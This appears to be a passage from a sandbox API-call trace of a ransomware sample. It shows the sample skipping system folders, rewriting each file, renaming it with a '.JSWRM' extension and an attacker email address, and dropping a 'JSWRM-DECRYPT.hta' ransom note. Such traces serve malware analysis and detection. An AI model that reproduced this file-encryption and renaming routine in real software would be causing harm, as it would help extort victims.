dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.365] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=93314) returned 1 [0060.365] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16c80) returned 0x2471a8 [0060.365] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x16c80, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x16c80, lpOverlapped=0x0) returned 1 [0060.372] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.372] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x16c80, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x16c80, lpOverlapped=0x0) returned 1 [0060.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.373] CloseHandle (hObject=0x3d4) returned 1 [0060.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0060.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0060.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0060.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0060.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0060.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0060.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0060.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.387] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), lpNewFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0060.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0060.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0060.387] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0060.387] lstrcmpiW (lpString1="UiInfo.xml", lpString2=".") returned 1 [0060.387] lstrcmpiW (lpString1="UiInfo.xml", lpString2="..") returned 1 [0060.387] lstrcmpiW (lpString1="UiInfo.xml", lpString2="...") returned 1 [0060.387] lstrcmpiW (lpString1="UiInfo.xml", lpString2="windows") returned -1 [0060.387] lstrcmpiW (lpString1="UiInfo.xml", lpString2="recovery") returned 1 [0060.387] lstrcmpiW (lpString1="UiInfo.xml", lpString2="perflogs") returned 1 [0060.387] lstrcmpiW (lpString1="UiInfo.xml", lpString2="documents and settings") returned 1 [0060.388] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$RECYCLE.BIN") returned 1 [0060.388] lstrcmpiW (lpString1="UiInfo.xml", lpString2="system volume information") returned 1 [0060.388] lstrcmpiW (lpString1="UiInfo.xml", lpString2="msocache") returned 1 [0060.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0060.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x345f610, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UiInfo.xml", lpUsedDefaultChar=0x0) returned 10 [0060.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0060.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0060.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UiInfo.xml", cchWideChar=10, lpMultiByteStr=0x345f5e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UiInfo.xml", lpUsedDefaultChar=0x0) returned 10 [0060.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0060.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ee520 | out: hHeap=0x1e0000) returned 1 [0060.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0060.388] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.388] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=39050) returned 1 [0060.388] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9880) returned 0x2471a8 [0060.389] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x9880, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x9880, lpOverlapped=0x0) returned 1 [0060.393] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.393] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x9880, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x9880, lpOverlapped=0x0) returned 1 [0060.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.394] CloseHandle (hObject=0x3d4) returned 1 [0060.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0060.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0060.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0060.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0060.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0060.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.396] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), lpNewFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0060.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0060.398] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0060.398] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0060.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0060.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0060.398] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Graphics", cAlternateFileName="")) returned 1 [0060.398] lstrcmpiW (lpString1="Graphics", lpString2=".") returned 1 [0060.398] lstrcmpiW (lpString1="Graphics", lpString2="..") returned 1 [0060.398] lstrcmpiW (lpString1="Graphics", lpString2="...") returned 1 [0060.398] lstrcmpiW (lpString1="Graphics", lpString2="windows") returned -1 [0060.398] lstrcmpiW (lpString1="Graphics", lpString2="recovery") returned -1 [0060.399] lstrcmpiW (lpString1="Graphics", lpString2="perflogs") returned -1 [0060.399] lstrcmpiW (lpString1="Graphics", lpString2="documents and settings") returned 1 [0060.399] lstrcmpiW (lpString1="Graphics", lpString2="$RECYCLE.BIN") returned 1 [0060.399] lstrcmpiW (lpString1="Graphics", lpString2="system volume information") returned -1 [0060.399] lstrcmpiW (lpString1="Graphics", lpString2="msocache") returned -1 [0060.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0060.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2260b0 [0060.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0060.399] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\graphics\\jswrm-decrypt.hta")) returned 0xffffffff [0060.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2260b0 | out: hHeap=0x1e0000) returned 1 [0060.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0060.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0060.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0060.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0060.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0060.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0060.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225b30 [0060.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0060.402] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\graphics\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.403] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.403] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0060.404] CloseHandle (hObject=0x450) returned 1 [0060.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225b30 | out: hHeap=0x1e0000) returned 1 [0060.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0060.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0060.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2260b0 [0060.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0060.404] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\graphics\\jswrm-decrypt.hta")) returned 0x20 [0060.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2260b0 | out: hHeap=0x1e0000) returned 1 [0060.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0060.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0060.404] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1aa95143, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0060.405] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.405] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1aa95143, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="..", cAlternateFileName="")) returned 1 [0060.405] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.405] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.405] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aa95143, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1aa95143, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1aa95143, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0060.405] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0060.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0060.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0060.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0060.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0060.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0060.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0060.405] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0060.405] lstrcmpiW (lpString1="Print.ico", lpString2=".") returned 1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="..") returned 1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="...") returned 1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="windows") returned -1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="recovery") returned -1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="perflogs") returned 1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="documents and settings") returned 1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="system volume information") returned -1 [0060.406] lstrcmpiW (lpString1="Print.ico", lpString2="msocache") returned 1 [0060.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Print.ico", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0060.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Print.ico", cchWideChar=9, lpMultiByteStr=0x345f610, cbMultiByte=9, 